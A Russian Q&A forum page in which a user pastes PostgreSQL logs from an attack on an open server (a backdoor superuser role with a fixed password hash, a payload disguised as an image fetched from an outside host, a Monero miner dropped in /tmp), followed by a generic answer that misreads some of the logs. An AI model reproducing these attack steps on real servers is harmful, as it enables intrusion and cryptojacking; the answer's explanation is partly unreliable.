Как работает вирус monero распространяемый через postgresql? Открыл я как-то postgesql сервер на все соединения 0.0.0.0/0 trust т.е. заходи кто хочешь без пароля.
И вот что появилось в логах
[18419-1] postgres@postgres ERROR: large object 4000006040 does not exist
[18419-2] postgres@postgres STATEMENT: select lo_unlink(4000006040)
[18419-3] postgres@postgres ERROR: function obj4000006040(bigint, unknown) does not exist at character 8
[18419-4] postgres@postgres HINT: No function matches the given name and argument types. You might need to add explicit type casts.
[18419-5] postgres@postgres STATEMENT: select obj4000006040(4000006040, './tmp4000006040');
WARNING: you should run this program as super-user.
WARNING: output may be incomplete or inaccurate, you should run this program as super-user.
[18419-6] postgres@postgres ERROR: role "e894c9c8" already exists
[18419-7] postgres@postgres STATEMENT: CREATE ROLE E894C9C8 LOGIN ENCRYPTED PASSWORD 'md51351dbb7fe95c1f277282bc842cb3d6b' SUPERUSER CREATEDB CREATEROLE REPLICATION VALID UNTIL 'infinity';
[18419-8] postgres@postgres ERROR: role "e894c9c8" already exists
[18419-9] postgres@postgres STATEMENT: CREATE ROLE E894C9C8 LOGIN ENCRYPTED PASSWORD 'md51351dbb7fe95c1f277282bc842cb3d6b' SUPERUSER CREATEDB CREATEROLE VALID UNTIL 'infinity';img1.imagehousing.com/0/art-981754.png
Resolving img1.imagehousing.com (img1.imagehousing.com)... 104.27.181.36, 104.27.180.36, 2400:cb00:2048:1::681b:b424, ...
Connecting to img1.imagehousing.com (img1.imagehousing.com)|104.27.181.36|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 517120 (505K) [image/png]
Saving to: ‘flagdspo.jpg’
0K .......... .......... .......... .......... .......... 9% 40.9M 0s
50K .......... .......... .......... .......... .......... 19% 89.3M 0s
100K .......... .......... .......... .......... .......... 29% 66.1M 0s
150K .......... .......... .......... .......... .......... 39% 137M 0s
200K .......... .......... .......... .......... .......... 49% 65.9M 0s
250K .......... .......... .......... .......... .......... 59% 77.2M 0s
300K .......... .......... .......... .......... .......... 69% 88.6M 0s
350K .......... .......... .......... .......... .......... 79% 83.7M 0s
400K .......... .......... .......... .......... .......... 89% 136M 0s
450K .......... .......... .......... .......... .......... 99% 76.2M 0s
500K ..... 100% 143M=0.006s
(77.4 MB/s) - ‘flagdspo.jpg’ saved [517120/517120]
496464+0 records in
496464+0 records out
496464 bytes (496 kB, 485 KiB) copied, 0.554038 s, 896 kB/s
[29796-10] postgres@postgres ERROR: role "pgsql" does not exist
[29796-11] postgres@postgres STATEMENT: DROP USER pgsql;
В папке /tmp/ появился файл 4000006040 который является monero клиентом скаченным с официального репозитория в гитхаб.
Вопрос собственно что это за команды, и как этот файл там появился, из логов я не совсем понимаю что за функция obj4000006040, ее наличие все бы прояснило. В интернете не нашел описания такого метода распространения.

21 Авг 2019 в 07:11
173 +1
0
Ответы
1

Этот вирус, распространяемый через PostgreSQL, использует уязвимость в вашем сервере, который открыт на все соединения без пароля. Как видно из логов, вирус создает новые роли и выполняет различные SQL запросы, включая создание нового пользователя "pgsql" и его удаление.

Файл 4000006040, который появился в папке /tmp/, является Monero майнером, который начинает майнить криптовалюту Monero на вашем сервере. Это делается без вашего разрешения и может привести к значительному увеличению загрузки сервера и потреблению ресурсов.

Функция obj4000006040, о которой идет речь в логах, скорее всего является частью вируса, который использует эту функцию для выполнения своих действий.

Чтобы защитить свой сервер от подобных атак, рекомендуется закрыть доступ к серверу только для авторизованных пользователей, использовать надежные пароли и регулярно обновлять ПО на сервере. Также следует проверить систему на наличие вредоносных программ и удалить все подозрительные файлы и процессы.

20 Апр в 13:06
Не можешь разобраться в этой теме?
Обратись за помощью к экспертам
Название заказа не должно быть пустым
Введите email
Бесплатные доработки
Гарантированные бесплатные доработки
Быстрое выполнение
Быстрое выполнение от 2 часов
Проверка работы
Проверка работы на плагиат
Интересные статьи из справочника
Поможем написать учебную работу
Название заказа не должно быть пустым
Введите email
Доверьте свою работу экспертам
Разместите заказ
Наша система отправит ваш заказ на оценку 84 683 авторам
Первые отклики появятся уже в течение 10 минут
Прямой эфир